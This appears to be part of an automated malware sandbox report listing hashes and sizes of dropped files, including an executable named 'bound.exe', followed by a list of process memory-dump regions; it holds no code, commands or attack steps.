SHA512: be596e2829c6978d7f138f79059172024ee73cd3e1f3d7a24aaca4b0d85a2302e2060e6cebd54854e7f08ed66b665429d38bb22c512dd82533d8ba87a426f515
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sgoleqnr.jz5.ps1
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\bound.exe
Filesize: 1.4MB
MD5: 85091f0dca9adc1bc302eba94fd1398d
SHA1: 36d336b4c6ba61112e4f98a8af96605d9a49afbe
SHA256: 3b1aa1f5485cd77a5a736b336ed189ac4e837a699acd36fc415c2bc7cb4748de
SHA512: 0a98f92a9b1c0e57bd7a4526895a1a0177a3a4783c6b5ee9beee09e3de7b30c97210336e7fca115ed39af7626446b22db7511b508a4280f45b077286225f7888
-
memory/908-188-0x00007FF6075E0000-0x00007FF607754000-memory.dmp
Filesize: 1.5MB
-
memory/908-87-0x00007FF6075E0000-0x00007FF607754000-memory.dmp
Filesize: 1.5MB
-
memory/2396-230-0x0000000007DF0000-0x0000000007E01000-memory.dmp
Filesize: 68KB
-
memory/2396-231-0x0000000007E40000-0x0000000007E54000-memory.dmp
Filesize: 80KB
-
memory/2396-216-0x0000000006340000-0x0000000006694000-memory.dmp
Filesize: 3.3MB
-
memory/2396-218-0x0000000006910000-0x000000000695C000-memory.dmp
Filesize: 304KB
-
memory/2396-219-0x0000000070370000-0x00000000703BC000-memory.dmp
Filesize: 304KB
-
memory/2396-229-0x0000000007B50000-0x0000000007BF3000-memory.dmp
Filesize: 652KB
-
memory/3308-56-0x00000000755C0000-0x00000000755E7000-memory.dmp
Filesize: 156KB
-
memory/3308-73-0x00000000750A0000-0x00000000752FA000-memory.dmp
Filesize: 2.4MB
-
memory/3308-79-0x0000000075600000-0x000000007561F000-memory.dmp
Filesize: 124KB
-
memory/3308-76-0x0000000075650000-0x0000000075B5B000-memory.dmp
Filesize: 5.0MB
-
memory/3308-83-0x00000000755F0000-0x00000000755FD000-memory.dmp
Filesize: 52KB
-
memory/3308-84-0x0000000074EF0000-0x0000000075009000-memory.dmp
Filesize: 1.1MB
-
memory/3308-66-0x00000000753D0000-0x00000000753DC000-memory.dmp
Filesize: 48KB
-
memory/3308-62-0x0000000075440000-0x0000000075577000-memory.dmp
Filesize: 1.2MB
-
memory/3308-60-0x0000000075580000-0x000000007559B000-memory.dmp
Filesize: 108KB
-
memory/3308-248-0x0000000075650000-0x0000000075B5B000-memory.dmp
Filesize: 5.0MB
-
memory/3308-233-0x0000000075650000-0x0000000075B5B000-memory.dmp
Filesize: 5.0MB
-
memory/3308-77-0x0000000075030000-0x0000000075040000-memory.dmp
Filesize: 64KB
-
memory/3308-58-0x00000000755A0000-0x00000000755B8000-memory.dmp
Filesize: 96KB
-
memory/3308-65-0x0000000075420000-0x0000000075436000-memory.dmp
Filesize: 88KB
-
memory/3308-72-0x0000000075300000-0x0000000075394000-memory.dmp
Filesize: 592KB
-
memory/3308-80-0x0000000075020000-0x000000007502C000-memory.dmp
Filesize: 48KB
-
memory/3308-74-0x0000000003D30000-0x0000000003F8A000-memory.dmp
Filesize: 2.4MB
-
memory/3308-68-0x00000000753A0000-0x00000000753C8000-memory.dmp
Filesize: 160KB
-
memory/3308-190-0x0000000075650000-0x0000000075B5B000-memory.dmp
Filesize: 5.0MB
-
memory/3308-189-0x0000000003D30000-0x0000000003F8A000-memory.dmp
Filesize: 2.4MB
-
memory/3308-33-0x00000000755F0000-0x00000000755FD000-memory.dmp
Filesize: 52KB
-
memory/3308-173-0x0000000075600000-0x000000007561F000-memory.dmp
Filesize: 124KB
-
memory/3308-179-0x0000000075420000-0x0000000075436000-memory.dmp
Filesize: 88KB
-
memory/3308-181-0x00000000753A0000-0x00000000753C8000-memory.dmp
Filesize: 160KB
-
memory/3308-182-0x0000000075300000-0x0000000075394000-memory.dmp
Filesize: 592KB
-
memory/3308-183-0x00000000750A0000-0x00000000752FA000-memory.dmp
Filesize: 2.4MB
-
memory/3308-186-0x0000000074EF0000-0x0000000075009000-memory.dmp
Filesize: 1.1MB
-
memory/3308-187-0x0000000075440000-0x0000000075577000-memory.dmp
Filesize: 1.2MB
-
memory/3308-172-0x0000000075650000-0x0000000075B5B000-memory.dmp
Filesize: 5.0MB
-
memory/3308-171-0x0000000075580000-0x000000007559B000-memory.dmp
Filesize: 108KB
-
memory/3308-30-0x0000000075600000-0x000000007561F000-memory.dmp
Filesize: 124KB
-
memory/3308-26-0x0000000075650000-0x0000000075B5B000-memory.dmp
Filesize: 5.0MB
-
memory/3708-164-0x0000000007C00000-0x0000000007C1A000-memory.dmp
Filesize: 104KB
-
memory/3708-161-0x0000000007AC0000-0x0000000007AD1000-memory.dmp
Filesize: 68KB
-
memory/3708-91-0x00000000055F0000-0x0000000005612000-memory.dmp
Filesize: 136KB
-
memory/3708-147-0x000000006FFA0000-0x000000006FFEC000-memory.dmp
Filesize: 304KB
-
memory/4784-124-0x00000000062D0000-0x0000000006302000-memory.dmp
Filesize: 200KB
-
memory/4784-135-0x000000006FFA0000-0x000000006FFEC000-memory.dmp
Filesize: 304KB
-
memory/4784-159-0x00000000070B0000-0x00000000070BA000-memory.dmp
Filesize: 40KB
-
memory/4784-90-0x0000000004FC0000-0x00000000055E8000-memory.dmp
Filesize: 6.2MB
-
memory/4784-163-0x0000000007280000-0x0000000007294000-memory.dmp
Filesize: 80KB
-
memory/4784-162-0x0000000007270000-0x000000000727E000-memory.dmp
Filesize: 56KB
-
memory/4784-146-0x0000000006EE0000-0x0000000006F83000-memory.dmp
Filesize: 652KB
-
memory/4784-122-0x0000000005CF0000-0x0000000005D0E000-memory.dmp
Filesize: 120KB
-
memory/4784-123-0x0000000005D20000-0x0000000005D6C000-memory.dmp
Filesize: 304KB
-
memory/4784-160-0x00000000072C0000-0x0000000007356000-memory.dmp
Filesize: 600KB
-
memory/4932-125-0x000000006FFA0000-0x000000006FFEC000-memory.dmp
Filesize: 304KB
-
memory/4932-145-0x0000000006640000-0x000000000665E000-memory.dmp
Filesize: 120KB
-
memory/4932-165-0x00000000076F0000-0x00000000076F8000-memory.dmp
Filesize: 32KB
-
memory/4932-103-0x0000000005BC0000-0x0000000005F14000-memory.dmp
Filesize: 3.3MB
-
memory/4932-157-0x0000000007A20000-0x000000000809A000-memory.dmp
Filesize: 6.5MB
-
memory/4932-92-0x0000000005320000-0x0000000005386000-memory.dmp
Filesize: 408KB
-
memory/4932-93-0x0000000005390000-0x00000000053F6000-memory.dmp
Filesize: 408KB
-
memory/4932-158-0x00000000073D0000-0x00000000073EA000-memory.dmp
Filesize: 104KB
-
memory/4932-89-0x0000000002840000-0x0000000002876000-memory.dmp
Filesize: 216KB